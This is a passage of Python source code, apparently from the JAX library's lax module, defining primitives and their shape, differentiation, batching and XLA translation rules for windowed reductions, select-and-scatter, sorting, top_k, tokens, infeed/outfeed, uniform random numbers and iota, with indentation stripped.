_reduce_window_shape_rule, _input_dtype, 'reduce_window',
_reduce_window_translation_rule)
batching.primitive_batchers[reduce_window_p] = _generic_reduce_window_batch_rule
def _reduce_window_sum_shape_rule(operand, *, window_dimensions, window_strides,
padding, base_dilation, window_dilation):
if not dtypes.issubdtype(operand.dtype, np.number):
msg = "operand to reduce_window_sum must have a number dtype, got {}"
raise TypeError(msg.format(np.dtype(operand.dtype).name))
return _common_reduce_window_shape_rule(operand, window_dimensions,
window_strides, padding, base_dilation,
window_dilation)
def _reduce_window_sum_translation_rule(c, operand, *, window_dimensions,
window_strides, padding, base_dilation,
window_dilation):
dtype = c.get_shape(operand).numpy_dtype()
scalar = ShapedArray((), dtype)
return xops.ReduceWindowWithGeneralPadding(
operand, xb.constant(c, np.array(0, dtype)),
xla.primitive_subcomputation(add_p, scalar, scalar), window_dimensions,
window_strides, base_dilation, window_dilation, padding)
def _reduce_window_sum_transpose_rule(cotangent, operand, *, window_dimensions,
window_strides, padding, base_dilation,
window_dilation):
assert ad.is_undefined_primal(operand)
input_shape = operand.aval.shape
pads = _conv_general_vjp_lhs_padding(
input_shape, window_dimensions, window_strides, cotangent.shape, padding,
base_dilation, window_dilation)
ones = [1] * len(input_shape)
padding_config = [(lo, hi, stride - 1)
for (lo, hi), stride in zip(pads, window_strides)]
pad_cotangent = pad(cotangent, _zero(cotangent), padding_config)
result = _reduce_window_sum(pad_cotangent, window_dimensions, base_dilation,
[(0, 0)] * len(input_shape),
base_dilation=ones,
window_dilation=window_dilation)
assert result.shape == input_shape, (result.shape, input_shape)
return [result]
def _reduce_window_batch_rule(reduce_window, batched_args, bdims, *,
window_dimensions, window_strides, padding,
base_dilation, window_dilation):
operand, = batched_args
bdim, = bdims
if bdim is not None:
window_dimensions = \
window_dimensions[:bdim] + (1,) + window_dimensions[bdim:]
window_strides = window_strides[:bdim] + (1,) + window_strides[bdim:]
padding = padding[:bdim] + ((0, 0),) + padding[bdim:]
base_dilation = base_dilation[:bdim] + (1,) + base_dilation[bdim:]
window_dilation = window_dilation[:bdim] + (1,) + window_dilation[bdim:]
operand = reduce_window(operand, window_dimensions, window_strides, padding,
base_dilation, window_dilation)
return operand, bdim
reduce_window_sum_p = standard_primitive(
_reduce_window_sum_shape_rule, _input_dtype, 'reduce_window_sum',
_reduce_window_sum_translation_rule)
ad.deflinear2(reduce_window_sum_p, _reduce_window_sum_transpose_rule)
batching.primitive_batchers[reduce_window_sum_p] = partial(
_reduce_window_batch_rule, _reduce_window_sum)
def _reduce_window_chooser_translation_rule(
prim, identity, c, operand, *, window_dimensions, window_strides, padding,
base_dilation, window_dilation):
dtype = c.get_shape(operand).numpy_dtype()
scalar = ShapedArray((), dtype)
return xops.ReduceWindowWithGeneralPadding(
operand, xb.constant(c, identity(dtype)),
xla.primitive_subcomputation(prim, scalar, scalar), window_dimensions,
window_strides, base_dilation, window_dilation, padding)
def _reduce_window_chooser_jvp_rule(prim, g, operand, *, window_dimensions,
window_strides, padding, base_dilation,
window_dilation):
assert prim is max_p or prim is min_p
select_prim = ge_p if prim is max_p else le_p
return _select_and_gather_add(g, operand, select_prim, window_dimensions,
window_strides, padding, base_dilation,
window_dilation)
def _common_reduce_window_shape_rule(operand, window_dimensions,
window_strides, padding, base_dilation,
window_dilation):
_check_shapelike("reduce_window", "window_dimensions", window_dimensions,
non_zero_shape=True)
_check_shapelike("reduce_window", "window_strides", window_strides,
non_zero_shape=True)
_check_shapelike("reduce_window", "base_dilation", base_dilation)
_check_shapelike("reduce_window", "window_dilation", window_dilation)
if operand.ndim != len(window_dimensions):
msg = ("reduce_window got the wrong number of window_dimensions for "
"operand: got operand shape {} with window_dimensions {}.")
raise TypeError(msg.format(operand.shape, window_dimensions))
if len(window_strides) != len(window_dimensions):
msg = ("reduce_window got inconsistent window_strides and "
"window_dimensions: got window_strides {} and window_dimensions {}.")
raise TypeError(msg.format(window_strides, window_dimensions))
if len(base_dilation) != len(window_dimensions):
msg = ("reduce_window got inconsistent base_dilation and "
"window_dimensions: got base_dilation {} and window_dimensions {}.")
raise TypeError(msg.format(base_dilation, window_dimensions))
if len(window_dilation) != len(window_dimensions):
msg = ("reduce_window got inconsistent window_dilation and "
"window_dimensions: got window_dilation {} and window_dimensions "
"{}.")
raise TypeError(msg.format(window_dilation, window_dimensions))
return reduce_window_shape_tuple(operand.shape, window_dimensions,
window_strides, padding, base_dilation,
window_dilation)
def reduce_window_shape_tuple(operand_shape, window_dimensions, window_strides,
padding, base_dilation=None,
window_dilation=None):
if base_dilation is not None:
operand_shape = _dilate_shape(operand_shape, base_dilation)
if window_dilation is not None:
window_dimensions = _dilate_shape(window_dimensions, window_dilation)
operand_padded = np.add(operand_shape, np.add(*zip(*padding)))
t = np.floor_divide(
np.subtract(operand_padded, window_dimensions), window_strides) + 1
return tuple(t)
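# Worked example (illustrative only): operand_shape=(10,), window_dimensions=(3,),
# window_strides=(2,), padding=((1, 1),) and no dilation give
#   operand_padded = 10 + 1 + 1 = 12
#   output size    = floor((12 - 3) / 2) + 1 = 5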
_reduce_window_max_translation_rule = partial(
_reduce_window_chooser_translation_rule, max_p, _get_max_identity)
reduce_window_max_p = standard_primitive(
_common_reduce_window_shape_rule, _input_dtype, 'reduce_window_max',
_reduce_window_max_translation_rule)
ad.defjvp(reduce_window_max_p, partial(_reduce_window_chooser_jvp_rule, max_p))
batching.primitive_batchers[reduce_window_max_p] = partial(
_reduce_window_batch_rule, _reduce_window_max)
_reduce_window_min_translation_rule = partial(
_reduce_window_chooser_translation_rule, min_p, _get_min_identity)
reduce_window_min_p = standard_primitive(
_common_reduce_window_shape_rule, _input_dtype, 'reduce_window_min',
_reduce_window_min_translation_rule)
ad.defjvp(reduce_window_min_p, partial(_reduce_window_chooser_jvp_rule, min_p))
_reduce_window_min_batch_rule = partial(_reduce_window_batch_rule,
_reduce_window_min)
batching.primitive_batchers[reduce_window_min_p] = partial(
_reduce_window_batch_rule, _reduce_window_min)
def _select_and_scatter_shape_rule(
operand, source, init_value, *, select_jaxpr, select_consts, scatter_jaxpr,
scatter_consts, window_dimensions, window_strides, padding):
_check_shapelike("select_and_scatter", "window_dimensions", window_dimensions)
_check_shapelike("select_and_scatter", "window_strides", window_strides)
if len(window_dimensions) != len(window_strides):
msg = ("select_and_scatter got inconsistent window_strides and "
"window_dimensions: got window_strides {} and window_dimensions {}.")
raise TypeError(msg.format(window_strides, window_dimensions))
return operand.shape
def _select_and_scatter_translation(
c, operand, source, init_value, *, select_jaxpr, select_consts, scatter_jaxpr,
scatter_consts, window_dimensions, window_strides, padding):
select = _reduction_computation(c, select_jaxpr, select_consts, init_value)
scatter = _reduction_computation(c, scatter_jaxpr, scatter_consts, init_value)
return xops.SelectAndScatterWithGeneralPadding(
operand, select, window_dimensions, window_strides, padding, source,
init_value, scatter)
select_and_scatter_p = standard_primitive(
_select_and_scatter_shape_rule, _input_dtype, 'select_and_scatter',
_select_and_scatter_translation)
def _select_and_scatter_add_shape_rule(
source, operand, *, select_prim, window_dimensions, window_strides,
padding):
return operand.shape
def _select_and_scatter_add_translation(
c, source, operand, *, select_prim, window_dimensions, window_strides,
padding):
dtype = c.get_shape(operand).numpy_dtype()
scalar = ShapedArray((), dtype)
select = xla.primitive_subcomputation(select_prim, scalar, scalar)
scatter = xla.primitive_subcomputation(add_p, scalar, scalar)
zero = xb.constant(c, np.array(0, dtype))
return xops.SelectAndScatterWithGeneralPadding(
operand, select, window_dimensions, window_strides, padding, source, zero,
scatter)
def _select_and_scatter_add_jvp(
primals, tangents, *, select_prim, window_dimensions, window_strides,
padding):
source, operand = primals
g_source, g_operand = tangents
val_out = _select_and_scatter_add(
source, operand, select_prim, window_dimensions, window_strides,
padding)
del g_operand
if type(g_source) is ad_util.Zero:
tangent_out = ad_util.Zero.from_value(val_out)
else:
tangent_out = _select_and_scatter_add(
g_source, operand, select_prim, window_dimensions,
window_strides, padding)
return val_out, tangent_out
def _select_and_scatter_add_transpose(
t, source, operand, *, select_prim, window_dimensions, window_strides,
padding):
assert ad.is_undefined_primal(source) and not ad.is_undefined_primal(operand)
ones = (1,) * len(window_dimensions)
source_t = _select_and_gather_add(t, operand, select_prim, window_dimensions,
window_strides, padding, ones, ones)
return [source_t, None]
def _select_and_scatter_add_batch_rule(
batched_args, batch_dims, *, select_prim, window_dimensions, window_strides,
padding):
source, operand = batched_args
s_bdim, o_bdim = batch_dims
size = next(a.shape[bdim] for a, bdim in zip(batched_args, batch_dims)
if bdim is not None)
source = batching.bdim_at_front(source, s_bdim, size)
operand = batching.bdim_at_front(operand, o_bdim, size)
window_dimensions = (1,) + window_dimensions
window_strides = (1,) + window_strides
padding = ((0, 0),) + padding
out = _select_and_scatter_add(source, operand, select_prim, window_dimensions,
window_strides, padding)
return out, 0
select_and_scatter_add_p = standard_primitive(
_select_and_scatter_add_shape_rule, _input_dtype, 'select_and_scatter_add',
_select_and_scatter_add_translation)
ad.primitive_transposes[select_and_scatter_add_p] = \
_select_and_scatter_add_transpose
ad.primitive_jvps[select_and_scatter_add_p] = _select_and_scatter_add_jvp
batching.primitive_batchers[select_and_scatter_add_p] = \
_select_and_scatter_add_batch_rule
def _select_and_gather_add_shape_rule(
tangents, operand, *, select_prim, window_dimensions, window_strides,
padding, base_dilation, window_dilation):
if tangents.shape != operand.shape:
msg = ("select_and_gather_add tangents and operand shapes must match, "
"got {} and {}.")
raise TypeError(msg.format(tangents.shape, operand.shape))
return _common_reduce_window_shape_rule(
operand, window_dimensions, window_strides, padding, base_dilation,
window_dilation)
_UINT_DTYPES = {
16: np.uint16,
32: np.uint32,
64: np.uint64,
}
_INT_DTYPES = {
16: np.int16,
32: np.int32,
64: np.int64,
}
def _select_and_gather_add_translation(
c, tangents, operand, *, select_prim, window_dimensions, window_strides,
padding, base_dilation, window_dilation, max_bits=64):
shape = c.get_shape(operand)
dtype = shape.numpy_dtype()
etype = shape.xla_element_type()
nbits = dtypes.finfo(dtype).bits
assert nbits <= max_bits
double_word_reduction = nbits * 2 <= max_bits
const = lambda c, dtype, x: xb.constant(c, np.array(x, dtype=dtype),
canonicalize_types=False)
if double_word_reduction:
# TODO(b/73062247): XLA doesn't yet implement ReduceWindow on tuples, so
# we implement a pair-wise ReduceWindow by packing two k-bit values into
    # a 2k-bit unsigned integer using bit tricks.
word_dtype = _UINT_DTYPES[nbits]
double_word_dtype = _UINT_DTYPES[nbits * 2]
word_type = xla_client.dtype_to_etype(word_dtype)
double_word_type = xla_client.dtype_to_etype(double_word_dtype)
# Packs two values into a tuple.
def pack(a, b):
a = xops.BitcastConvertType(a, word_type)
b = xops.BitcastConvertType(b, word_type)
a = xops.ConvertElementType(a, double_word_type)
b = xops.ConvertElementType(b, double_word_type)
a = xops.ShiftLeft(a, const(c, double_word_dtype, nbits))
return xops.Or(a, b)
# Unpacks the first element of a tuple.
def fst(c, t):
st = xops.ShiftRightLogical(t, const(c, double_word_dtype, nbits))
return xops.BitcastConvertType(xops.ConvertElementType(st, word_type), etype)
# Unpacks the second element of a tuple.
def snd(t):
return xops.BitcastConvertType(xops.ConvertElementType(t, word_type), etype)
else:
# The double-word trick above only works if we have a sufficiently large
# type. As an alternative, we can pack two half words into a single word,
# at the cost of precision.
# TODO(b/73062247): add support for tuple reductions and remove this case.
warnings.warn("Using reduced precision for gradient of reduce-window "
"min/max operator to work around missing XLA support for "
"pair-reductions. This is likely from a second or "
"higher derivative of a max-pooling operation.")
r_nbits = nbits // 2
# Drop/round the bottom mantissa bits.
nexp = dtypes.finfo(dtype).nexp
nmant = r_nbits - nexp - 1
double_word_dtype = word_dtype = _UINT_DTYPES[nbits]
word_type = xla_client.dtype_to_etype(word_dtype)
# Packs two values into a tuple.
def pack(a, b):
a = xops.ReducePrecision(a, exponent_bits=nexp, mantissa_bits=nmant)
b = xops.ReducePrecision(b, exponent_bits=nexp, mantissa_bits=nmant)
a = xops.BitcastConvertType(a, word_type)
b = xops.BitcastConvertType(b, word_type)
b = xops.ShiftRightLogical(b, const(c, word_dtype, r_nbits))
return xops.Or(a, b)
# Unpacks the first element of a tuple.
def fst(c, t):
st = xops.And(t, const(c, word_dtype, ((1 << r_nbits) - 1) << r_nbits))
return xops.BitcastConvertType(st, etype)
# Unpacks the second element of a tuple.
def snd(t):
return xops.BitcastConvertType(xops.ShiftLeft(t, const(c, word_dtype, r_nbits)),
etype)
def reducer():
c = xla_bridge.make_computation_builder("select_and_gather_pair_reducer")
x = xb.parameter(c, 0,
xla_client.Shape.array_shape(np.dtype(double_word_dtype), ()))
y = xb.parameter(c, 1,
xla_client.Shape.array_shape(np.dtype(double_word_dtype), ()))
assert select_prim is ge_p or select_prim is le_p
which = xops.Ge if select_prim is ge_p else xops.Le
xops.Select(which(fst(c, x), fst(c, y)), x, y)
return c.build()
assert select_prim is ge_p or select_prim is le_p, select_prim
init = -np.inf if select_prim is ge_p else np.inf
out = xops.ReduceWindowWithGeneralPadding(
pack(operand, tangents), pack(const(c, dtype, init), const(c, dtype, 0)),
reducer(), window_dimensions, window_strides, base_dilation,
window_dilation, padding)
return snd(out)
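# Minimal sketch of the double-word packing used above (illustrative only;
# plain NumPy, assuming float32 values so a (value, tangent) pair fits in a
# uint64):
#   a_bits = np.float32(1.5).view(np.uint32)                  # value word
#   b_bits = np.float32(2.5).view(np.uint32)                  # tangent word
#   packed = (np.uint64(a_bits) << np.uint64(32)) | np.uint64(b_bits)
#   fst    = np.uint32(packed >> np.uint64(32)).view(np.float32)        # 1.5
#   snd    = np.uint32(packed & np.uint64(0xffffffff)).view(np.float32) # 2.5
# The reducer then compares packed words by their high (value) halves only.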
def _select_and_gather_add_jvp(
primals, tangents, *, select_prim, window_dimensions, window_strides,
padding, base_dilation, window_dilation):
source, operand = primals
g_source, g_operand = tangents
val_out = _select_and_gather_add(
source, operand, select_prim, window_dimensions, window_strides,
padding, base_dilation, window_dilation)
del g_operand
if type(g_source) is ad_util.Zero:
tangent_out = ad_util.Zero.from_value(val_out)
else:
tangent_out = _select_and_gather_add(
g_source, operand, select_prim, window_dimensions,
window_strides, padding, base_dilation, window_dilation)
return val_out, tangent_out
def _select_and_gather_add_transpose(
t, tangents, operand, *, select_prim, window_dimensions, window_strides,
padding, base_dilation, window_dilation):
assert select_prim in (le_p, ge_p)
assert ad.is_undefined_primal(tangents) and not ad.is_undefined_primal(operand)
if any(d != 1 for d in window_dilation):
msg = ("VJP not implemented for select_and_gather (MaxPool) with window "
"dilation, got window_dilation={}.")
raise NotImplementedError(msg.format(window_dilation))
if type(t) is ad_util.Zero:
return [ad_util.Zero(tangents.aval), None]
has_base_dilation = any(d != 1 for d in base_dilation)
if has_base_dilation:
select_identity = (_get_max_identity if select_prim is ge_p
else _get_min_identity)
operand = pad(operand, select_identity(operand.dtype),
tuple((0, 0, d - 1) for d in base_dilation))
result = _select_and_scatter_add(t, operand, select_prim, window_dimensions,
window_strides, padding)
if has_base_dilation:
    result = slice(result, (0,) * len(result.shape), result.shape,
                   base_dilation)
return [result, None]
def _select_and_gather_add_batching_rule(
batched_args, batch_dims, *, select_prim, window_dimensions, window_strides,
padding, base_dilation, window_dilation):
t, x = batched_args
t_bdim, x_bdim = batch_dims
size = next(a.shape[bdim] for a, bdim in zip(batched_args, batch_dims)
if bdim is not None)
t = batching.bdim_at_front(t, t_bdim, size)
x = batching.bdim_at_front(x, x_bdim, size)
window_dimensions = (1,) + window_dimensions
window_strides = (1,) + window_strides
padding = ((0, 0),) + padding
base_dilation = (1,) + base_dilation
window_dilation = (1,) + window_dilation
out = _select_and_gather_add(t, x, select_prim, window_dimensions,
window_strides, padding, base_dilation,
window_dilation)
return (out, 0)
select_and_gather_add_p = standard_primitive(
_select_and_gather_add_shape_rule, _input_dtype, 'select_and_gather_add',
_select_and_gather_add_translation)
ad.primitive_jvps[select_and_gather_add_p] = _select_and_gather_add_jvp
ad.primitive_transposes[select_and_gather_add_p] = \
_select_and_gather_add_transpose
batching.primitive_batchers[select_and_gather_add_p] = \
_select_and_gather_add_batching_rule
xla.backend_specific_translations['tpu'][select_and_gather_add_p] = partial(
_select_and_gather_add_translation,
max_bits=32)
def _sort_abstract_eval(*args, **kwargs):
args = tuple(raise_to_shaped(arg) for arg in args)
if any(arg.shape != args[0].shape for arg in args[1:]):
shapes = " ".join(str(a.shape) for a in args)
raise TypeError(f"Arguments to sort must have equal shapes, got: {shapes}")
return args
def _float_to_int_for_sort(x):
  # Switch from a floating point value to an integer value in such a way that
# when using the integer value to compare, we get the same result for normal
# values, and -nan is treated as the smallest value, and nan is treated as
# the largest value.
# If f is a float, and
# x = bit_cast<int32>(f);
# y = x < 0 ? int32_max - x : x;
# then y is ordered as an int32 such that finite values have the obvious
# order, -0 is ordered before 0, and -NaN and NaN appear at the beginning
# and end of the ordering.
  # Note that in order to keep the subtraction from overflowing, we calculate
  # int32_max - x as unsigned, and then convert back to signed.
if x.dtype == dtypes.bfloat16:
x = convert_element_type(x, np.float32)
nbits = np.finfo(x).bits
signed_dtype = _INT_DTYPES[nbits]
unsigned_dtype = _UINT_DTYPES[nbits]
signed = bitcast_convert_type(x, signed_dtype)
unsigned = bitcast_convert_type(x, unsigned_dtype)
flipped = bitcast_convert_type(
sub(unsigned_dtype(np.iinfo(signed_dtype).max), unsigned), signed_dtype)
return select(lt(signed, _zero(signed)), flipped, signed)
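# Illustrative check of the transform above (comment only): for x = -0.0 in
# float32 the raw bits are 0x80000000, so signed < 0 and the key becomes
# int32_max - 0x80000000 computed as uint32, i.e. 0xffffffff, which bit-casts
# back to -1; +0.0 keeps key 0, so -0.0 sorts just below +0.0 as intended.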
# Default comparator that sorts the operands lexicographically on the
# first `num_keys` arguments.
# For floating point types, a total order is created where
# -NaN < -infinity < ... < -0 < 0 < ... < infinity < NaN.
# For complex types, the (real, imag) pairs are sorted lexicographically
# (following NumPy's semantics).
# This code adds complex-number support and lexicographic ordering to the algorithm from:
# https://github.com/tensorflow/tensorflow/blob/ba43780830f09da72081fe5061c436f1c6203a92/tensorflow/compiler/xla/client/lib/comparators.h#L33
def _sort_lt_comparator(*operands, num_keys=1):
assert len(operands) >= 2 and len(operands) % 2 == 0, operands
assert len(operands) // 2 >= num_keys, (operands, num_keys)
x_keys, y_keys = [], []
for x, y in zip(operands[:2*num_keys:2], operands[1:2*num_keys:2]):
assert x.dtype == y.dtype, (x.dtype, y.dtype)
if np.issubdtype(x.dtype, np.complexfloating):
x_keys.extend([_float_to_int_for_sort(real(x)), _float_to_int_for_sort(imag(x))])
y_keys.extend([_float_to_int_for_sort(real(y)), _float_to_int_for_sort(imag(y))])
elif np.issubdtype(x.dtype, np.floating):
x_keys.append(_float_to_int_for_sort(x))
y_keys.append(_float_to_int_for_sort(y))
else:
x_keys.append(x)
y_keys.append(y)
p = None
for xk, yk in zip(x_keys[::-1], y_keys[::-1]):
p = (bitwise_or(lt(xk, yk), bitwise_and(eq(xk, yk), p)) if p is not None
else lt(xk, yk))
return p
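# Illustrative note: with num_keys=2 the loop above folds from the last key
# backwards and produces lt(x0, y0) | (eq(x0, y0) & lt(x1, y1)), i.e. the usual
# lexicographic "less than" over the key tuple.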
def _sort_translation_rule(c, *operands, dimension, is_stable, num_keys):
types = [c.get_shape(x).xla_element_type() for x in operands]
subc = xla_bridge.make_computation_builder("sort_lt_comparator")
params = [xb.parameter(subc, 2 * i + j, xc.Shape.array_shape(typ, ()))
for i, typ in enumerate(types) for j in range(2)]
result = xla.lower_fun(partial(_sort_lt_comparator, num_keys=num_keys),
multiple_results=False)(subc, *params)
comparator = subc.build(result)
out = xops.Sort(c, operands, dimension=dimension, is_stable=is_stable,
comparator=comparator)
return out if len(operands) != 1 else xops.Tuple(c, [out])
def _sort_jvp(primals, tangents, *, dimension, is_stable, num_keys):
shape = primals[0].shape
iotas = []
for dim, size in enumerate(shape):
dtype = np.int32 if size < np.iinfo(np.int32).max else np.int64
iotas.append(broadcasted_iota(dtype, shape, dim))
primals = sort_p.bind(*(primals + (iotas[dimension],)), dimension=dimension,
is_stable=is_stable, num_keys=num_keys)
idx = tuple(primals[-1] if i == dimension else iotas[i]
for i in range(len(shape)))
tangents_out = tuple(t if type(t) is ad_util.Zero else t[idx] for t in tangents)
return tuple(primals[:-1]), tangents_out
def _sort_batch_rule(batched_args, batch_dims, *, dimension, is_stable, num_keys):
prototype_arg, new_bdim = next(
(a, b) for a, b in zip(batched_args, batch_dims) if b is not None)
new_args = []
for arg, bdim in zip(batched_args, batch_dims):
if bdim is None:
dims = np.delete(np.arange(prototype_arg.ndim), new_bdim)
new_args.append(broadcast_in_dim(arg, prototype_arg.shape, dims))
else:
new_args.append(batching.moveaxis(arg, bdim, new_bdim))
new_dimension = dimension + (new_bdim <= dimension)
bdims = (new_bdim,) * len(new_args)
return (sort_p.bind(*new_args, dimension=new_dimension, is_stable=is_stable, num_keys=num_keys),
bdims)
sort_p = Primitive('sort')
sort_p.multiple_results = True
sort_p.def_impl(partial(xla.apply_primitive, sort_p))
sort_p.def_abstract_eval(_sort_abstract_eval)
xla.translations[sort_p] = _sort_translation_rule
ad.primitive_jvps[sort_p] = _sort_jvp
batching.primitive_batchers[sort_p] = _sort_batch_rule
def _top_k_abstract_eval(operand, *, k):
if k < 0:
raise ValueError("k argument to top_k must be nonnegative, got {}".format(k))
if len(operand.shape) == 0:
raise TypeError("top_k operand must have >= 1 dimension, got {}"
.format(operand.shape))
shape = list(operand.shape)
if shape[-1] < k:
msg = "k argument to top_k must be no larger than minor dimension; {} vs {}"
raise ValueError(msg.format(k, shape))
shape[-1] = k
return (operand.update(shape=shape, dtype=operand.dtype, weak_type=operand.weak_type),
operand.update(shape=shape, dtype=np.dtype(np.int32)))
def _top_k_jvp(primals, tangents, *, k):
operand, = primals
tangent, = tangents
primals_out = top_k(operand, k)
if type(tangent) is ad_util.Zero:
tangent_out = ad_util.Zero.from_value(primals_out[0])
else:
_, k_idxs = primals_out
idx_shape = k_idxs.shape
rank = len(idx_shape)
gather_index_shape = idx_shape + (1,)
gather_indices = []
for i in range(rank-1):
_iota = iota(k_idxs.dtype, idx_shape[i])
if not config.omnistaging_enabled:
_iota = tie_in(operand, _iota)
_iota = broadcast_in_dim(_iota, gather_index_shape, (i,))
gather_indices.append(_iota)
gather_indices.append(reshape(k_idxs, gather_index_shape))
gather_indices = concatenate(gather_indices, dimension=rank)
slice_sizes = (1,) * rank
dnums = GatherDimensionNumbers(
offset_dims=(),
collapsed_slice_dims=tuple(range(rank)),
start_index_map=tuple(range(rank)))
tangent_out = gather(tangent, gather_indices, dnums, slice_sizes)
return primals_out, (tangent_out, ad_util.Zero.from_value(primals_out[1]))
def _top_k_batch_rule(batched_args, batch_dims, *, k):
operand, = batched_args
bdim, = batch_dims
if bdim == operand.ndim-1:
perm = np.arange(operand.ndim)
perm[bdim-1], perm[bdim] = perm[bdim], perm[bdim-1]
top_k_v, top_k_i = top_k(transpose(operand, perm), k=k)
return (transpose(top_k_v, perm),
transpose(top_k_i, perm)), (bdim, bdim)
else:
return top_k(operand, k=k), (bdim, bdim)
top_k_p = Primitive('top_k')
top_k_p.multiple_results = True
top_k_p.def_impl(partial(xla.apply_primitive, top_k_p))
top_k_p.def_abstract_eval(_top_k_abstract_eval)
xla.translations[top_k_p] = partial(standard_translate, 'top_k')
ad.primitive_jvps[top_k_p] = _top_k_jvp
batching.primitive_batchers[top_k_p] = _top_k_batch_rule
def _stop_gradient_jvp_rule(primals, tangents):
# if we don't call stop_gradient here, we'd only peel off one autodiff tracer
x, = primals
return stop_gradient(x), ad_util.Zero.from_value(x)
def _stop_gradient_batch_rule(batched_args, batch_dims):
x, = batched_args
dim, = batch_dims
return stop_gradient(x), dim
ad.primitive_jvps[ad_util.stop_gradient_p] = _stop_gradient_jvp_rule
batching.primitive_batchers[ad_util.stop_gradient_p] = _stop_gradient_batch_rule
def create_token(_=None):
"""Creates an XLA token value with no preconditions for sequencing effects.
Experimental.
The argument is ignored. It exists for backward compatibility.
"""
if config.omnistaging_enabled:
return create_token_p.bind()
else:
x = _
if x is None:
raise ValueError(
'create_token needs a tie-in operand unless omnistaging is enabled.')
return create_token_p.bind(stop_gradient(x))
create_token_p = Primitive("create_token")
create_token_p.def_impl(partial(xla.apply_primitive, create_token_p))
create_token_p.def_abstract_eval(lambda *_: abstract_token)
xla.translations[create_token_p] = lambda c, *_: xops.CreateToken(c)
def after_all(*operands):
"""Merges one or more XLA token values. Experimental.
Wraps the XLA AfterAll operator."""
return after_all_p.bind(*operands)
def _after_all_abstract_eval(*operands):
if any(x is not abstract_token for x in operands):
raise TypeError("Arguments to after_all must be tokens")
return abstract_token
def _after_all_translation_rule(c, *operands):
return xops.AfterAll(c, operands)
after_all_p = Primitive("after_all")
after_all_p.def_impl(partial(xla.apply_primitive, after_all_p))
after_all_p.def_abstract_eval(_after_all_abstract_eval)
xla.translations[after_all_p] = _after_all_translation_rule
def infeed(token, shape=None, partitions=None):
"""Consumes an infeed value of `shape` from the host. Experimental.
`token` is used to sequence infeed and outfeed effects.
`partitions` may be specified inside a `sharded_jit` function.
"""
flat_shapes, treedef = pytree.flatten(shape)
for shape in flat_shapes:
if not isinstance(shape, ShapedArray):
raise TypeError("shape argument to infeed must be a pytree of "
"ShapedArray values, got {}".format(shape))
if partitions is not None:
# Always replicate token.
# We specifically use type() to raise an error for PartitionSpecs.
if type(partitions) != tuple: # pylint: disable=unidiomatic-typecheck
raise ValueError(f"'partitions' argument to infeed should be a tuple, "
f"got {partitions}")
partitions = partitions + (None,)
xs_and_token = infeed_p.bind(token, shapes=tuple(flat_shapes),
partitions=partitions)
return (treedef.unflatten(xs_and_token[:-1]), xs_and_token[-1])
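# Usage sketch (illustrative only, inside a jit-traced computation): a token is
# created once and threaded through infeed to sequence host transfers:
#   token = create_token()
#   (x,), token = infeed(token, shape=(ShapedArray((3,), np.float32),))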
def _infeed_abstract_eval(token, *, shapes, partitions):
if token is not abstract_token:
raise TypeError("First argument to infeed must be a token")
return shapes + (abstract_token,)
def _infeed_translation_rule(c, token, *, shapes, partitions):
shape = tuple(shape.with_major_to_minor_layout_if_absent()
for x in shapes for shape in xla.aval_to_xla_shapes(x))
build_infeed = partial(xops.InfeedWithToken, token,
xla_client.Shape.tuple_shape(shape))
if partitions:
xs_and_token = xb.with_sharding(c, partitions, build_infeed)
else:
# Note that infeed will default to replication if inside a sharded
# computation and no sharding is specified.
xs_and_token = build_infeed()
xs = xops.GetTupleElement(xs_and_token, 0)
token = xops.GetTupleElement(xs_and_token, 1)
outs = [xops.GetTupleElement(xs, i) for i in range(len(shapes))] + [token]
return xops.Tuple(c, outs)
infeed_p = Primitive("infeed")
infeed_p.multiple_results = True
infeed_p.def_impl(partial(xla.apply_primitive, infeed_p))
infeed_p.def_abstract_eval(_infeed_abstract_eval)
xla.translations[infeed_p] = _infeed_translation_rule
def outfeed(token, xs):
"""Outfeeds value `xs` to the host. Experimental.
`token` is used to sequence infeed and outfeed effects.
"""
flat_xs, _ = pytree.flatten(xs)
return outfeed_p.bind(token, *flat_xs)
def _outfeed_abstract_eval(token, *xs):
if token is not abstract_token:
raise TypeError("First argument to outfeed must be a token")
return abstract_token
def _outfeed_translation_rule(c, token, *xs):
t = xops.Tuple(c, xs)
return xops.OutfeedWithToken(t, token, c.get_shape(t))
outfeed_p = Primitive("outfeed")
outfeed_p.def_impl(partial(xla.apply_primitive, outfeed_p))
outfeed_p.def_abstract_eval(_outfeed_abstract_eval)
xla.translations[outfeed_p] = _outfeed_translation_rule
def rng_uniform(a, b, shape):
"""Stateful PRNG generator. Experimental and its use is discouraged.
  Returns uniformly distributed random numbers in the range [a, b).
You should use jax.random for most purposes; this function exists only for
niche use cases with special performance requirements.
This API may be removed at any time.
"""
return rng_uniform_p.bind(a, b, shape=tuple(shape))
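# Usage sketch (illustrative only; prefer jax.random for reproducible streams):
#   u = rng_uniform(np.float32(0.), np.float32(1.), shape=(2, 3))
# Both bounds must be scalars with identical dtypes, as checked by the
# abstract-eval rule below.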
def _rng_uniform_abstract_eval(a, b, *, shape):
if a.dtype != b.dtype:
raise ValueError(
"Arguments to rng_uniform must have identical dtypes, got {} "
"and {}.".format(a.dtype, b.dtype))
if a.shape != () or b.shape != ():
raise ValueError(
"Arguments to rng_uniform must be scalars; got shapes {} and {}."
.format(a.shape, b.shape))
return a.update(shape=shape, dtype=a.dtype, weak_type=(a.weak_type and b.weak_type))
def _rng_uniform_translation_rule(c, a, b, *, shape):
xla_shape = xc.Shape.array_shape(c.get_shape(a).xla_element_type(), shape)
return xops.RngUniform(a, b, xla_shape)
rng_uniform_p = Primitive("rng_uniform")
rng_uniform_p.def_impl(partial(xla.apply_primitive, rng_uniform_p))
rng_uniform_p.def_abstract_eval(_rng_uniform_abstract_eval)
xla.translations[rng_uniform_p] = _rng_uniform_translation_rule
def _iota_abstract_eval(*, dtype, shape, dimension):
_check_shapelike("iota", "shape", shape)
if not any(dtypes.issubdtype(dtype, t) for t in _num):
msg = 'iota does not accept dtype {}. Accepted dtypes are subtypes of {}.'
typename = str(np.dtype(dtype).name)
accepted_typenames = (t.__name__ for t in _num)
raise TypeError(msg.format(typename, ', '.join(accepted_typenames)))
if not 0 <= dimension < len(shape):
raise ValueError("iota dimension must be between 0 and len(shape), got "
f"dimension={dimension} for shape {shape}")
return ShapedArray(shape, dtype)
def _iota_translation_rule(c, dtype, shape, dimension):
etype = xla_client.dtype_to_etype(dtype)
xla_shape = xc.Shape.array_shape(etype, shape)
return xops.Iota(c, xla_shape, dimension)
iota_p = Primitive('iota')
iota_p.def_impl(partial(xla.apply_primitive, iota_p))
iota_p.def_abstract_eval(_iota_abstract_eval)
xla.translations[iota_p] = _iota_translation_rule
### util
_ndim = np.ndim
def _dilate_shape(shape, dilation):
